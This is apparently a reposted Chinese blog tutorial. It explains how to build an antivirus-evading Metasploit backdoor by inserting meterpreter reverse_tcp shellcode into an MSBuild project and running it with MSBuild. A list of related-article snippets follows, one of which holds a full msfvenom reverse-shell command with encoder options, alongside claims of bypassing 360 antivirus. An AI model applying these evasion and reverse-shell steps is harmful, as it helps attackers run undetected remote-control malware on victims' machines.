[技术分享]利用MSBuild制作msf免杀的后门

最新推荐文章于 2023-05-30 20:24:28 发布
最新推荐文章于 2023-05-30 20:24:28 发布
阅读量167 收藏
点赞数
原文链接:http://www.cnblogs.com/adislj777/p/5896882.html
版权

文章github上有公开现成的shellcode,这就是shellcode

 

      我这次选择了32位的那个版本来进行演示


 

     需要改写的是shellcode那部分:


 

选择CobaltStrike:payload>windows>meterpreter>reverse_tcp设置选项如下:监听端口:22222,生成的格式为c,弹到我的vps

msf上生成meterpreter的payload其实是shellcode的一种


 

把生成的.c文件拿出来,是以下这种格式:


 

把它调整为以下格式:(替换编码)


 

把这段shellcode特换到前面shellcode的地方,把数组的长度也改为自己shellcode的长度。


 

去到C:\Windows\Microsoft.Net\Framework\v4.0.30319\这个目录:执行木马


 

效果如下:

 
很6
 

 

个人观点这种shell可以有

 

link:

 

http://bobao.360.cn/learning/detail/3046.html



   



转载于:https://www.cnblogs.com/adislj777/p/5896882.html

weixin_30851867
关注
网络安全进阶篇之免杀(十四章-9)MSF加密壳免杀过360
划水的小白白
06-01 756
文章目录一、 概念1.1 360 安全卫士和 360 杀毒二、前期准备2.1 下载地址三、具体过程3.1 使用MSF生成木马并监听3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二、前期准备
msf免杀
weixin_30662849的博客
04-13 297
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
payload免杀msbuild利用
weixin_30883311的博客
09-19 346
0x00 前言 红队必备技巧免杀之一,现在主要是.net4.0下实现。待我过几天有空实现一下.net2.0。 0x01 免杀过程 利用cs生成c#的payload,如图所示: 将paypload内容填充到里面, <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer...
利用MSBuild制作msf免杀后门
热门推荐
Matthew
09-22 6万+
今天看到三好学生对MSBuild利用,它的好处这里已经说完,http://bobao.360.cn/learning/detail/3046.html,说可以有提供一种直接执行shellcode的方法,然后就尝试了一下通过MSBuild进行msf的木马后门免杀。         我这次选择了32位的那个版本来进行演示:      需要改写的是shellcode那部分:
渗透测试(一)-Msf生成免杀后门(内网篇)
阿航的博客
05-25 3006
实验环境: 攻击机:kali linux-2021.1(192.168.56.128) 靶机:Windows10(192.168.1.120) 推荐两个免费在线木马检测网站:VirusScan和VirusTotal 原理图: 1. Meterpreter简介 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作为攻击载荷能够获得目标系统的一个Meterpre..
MSBuild 12.0 14.0 17.0
07-16
MSBuild是Microsoft构建引擎的缩写,它是微软提供的一款用于构建.NET应用程序的工具。自2005年随Visual Studio .NET 2005首次发布以来,MSBuild已经成为.NET开发不可或缺的一部分,经历了多个版本的迭代,包括...
msbuild-sdks:MSBuild项目SDK
05-20
MSBuild SDK MSBuild SDK用于配置和扩展您的构建。 MSBuild 15.0引入了SDK的概念,它是一种升级的项目XML架构,我们通常将其称为“ SDK风格”项目。 因此,以下SDK需要MSBuild 15.0及更高版本 可用的SDK 支持不...
微软 MSBuild 详细介绍
01-27
Visual Studio利用MSBuild来加载和构建托管项目,但MSBuild并不依赖于Visual Studio。从Visual Studio 2022开始,IDE使用64位版本的MSBuild,以提供更大的内存访问权限,这对于大型项目尤其有用。 **命令行使用** ...
MSBUILD编译
04-07
- 利用MSBUILD的响应文件(.rsp)可以存储常用的参数设置,简化命令行输入。 综上所述,“Building-with-MSBUILD.pdf”这份文档可能会涵盖这些主题,帮助读者深入理解并熟练运用MSBUILD进行项目构建和部署。通过...
gulp-msbuild:gulp-msbuild已移至https:github.comfluffynutsgulp-msbuild
02-03
`gulp-msbuild`是将`msbuild`集成到`gulp`工作流中的一个插件,它允许开发者在`gulp`任务中调用`msbuild`来编译.NET项目。这对于同时处理前端和后端代码的开发者来说非常有用,因为它可以统一构建流程,提高工作效率...
利用360软件设置的360终极免杀.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360免杀.百分之百过360.... 希望大家采纳!!!!!
msf之进阶免杀技术,无视360
qq_42965523的博客
07-07 3208
大家好!我是阿杰,今天我写一篇关于msf免杀技术的文章,如果你喜欢请为我打call,我会一直写下去. 首先我们需要: 说明:python监听虽然可以绕过360,但仅限于安装了python的目标,这是具有局限性的,因此本文章教你如何生成python的exe攻击程序,并且绕过360.具有非常好的广泛性,请勿用于非法用途 pyinstaller 安装教程: 打开cmd 输入 pip install pyinstaller 静等下载完成即可 打开kali进入终端 输入以下指令生成一个python的文件 然后进
关于msf反弹后门免杀Tips
ai74583的博客
04-20 572
msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇文章只是讲讲我在msf中一个简单的免杀小技巧 思路 我以前接触过一款python的远控,其实说是远控,基本也就是nc的功能加了一个服务端的web页面控制并加了一些其他的功能可以用来管理诸多客户机 这款远控我下载下来用过,并用pyinstaller打包成了exe(缺点是体积太过庞大...
msf生成的攻击载荷进行免杀处理
Solar's Blog
04-30 3715
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
msfvenom payload 免杀简单实践
Hello World.c
02-22 937
免杀简单实践 实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本 很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己 稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后 用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。 选择payload 这里选择msf的经典payload:windows/meterpreter/reverse_tcp //生成c形式的payload msfvenom -a x86 -
msbuild 语法_【技术分享】Use MSBuild To Do More(渗透中MSBuild的应用技巧)
weixin_36123682的博客
01-17 157
作者:三好学生稿费:500RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿0x00 前言最近Casey Smith@subTee更新了一系列关于”MSBuild”的研究进展,对我有很大启发。本文将基于他公开的POC,并结合我的研究心得,介绍以下MSBuild的应用技巧:Execute PowerShell CommandsExecute PE fil...
vulnstack(红日)内网渗透靶场二: 免杀360拿下域控
最新发布
xf555er的博客
05-30 2470
当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内网穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24网段的主机进行远程登录。
asp 执行 exe_利用msbuild白名单执行绕安全防护程序提权
weixin_39640773的博客
11-21 334
0x00 前言平常我们在做渗透测试的过程总能遇到各种奇奇怪怪的问题,比如命令跑不起来,再比如在一定权限下加账号的时候被安全防护程序给阻止等问题,笔者这个案例就是讲的在安装了各种防护程序的情形下的一次突破(文章之前发布到其他平台,可能有些人已经看过了),看官们多担待。0x01 前期的信息刺探**首先拿到webshell,发现phpshell只能访问shell所在目录,连网站根目录都跨不过去...
技术分享】Use MSBuild To Do More(渗透中MSBuild的应用技巧)
SAKAISON的博客
09-21 749
0x00 前言 最近Casey Smith@subTee更新了一系列关于”MSBuild”的研究进展,对我有很大启发。 本文将基于他公开的POC,并结合我的研究心得,介绍以下MSBuild的应用技巧: Execute PowerShell Commands Execute PE file Execute Shellcode VisualStudio Pers
远控免杀技术:白名单策略详解(113个程序)
"这篇文档是关于远控免杀技术的实践总结,主要聚焦于白名单程序的使用,目的是在远程控制软件中避开安全检测。文章分为不同的类别,包括执行命令类和其他MSWindows程序,列举了共计113个可利用的程序。" 远控免杀是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值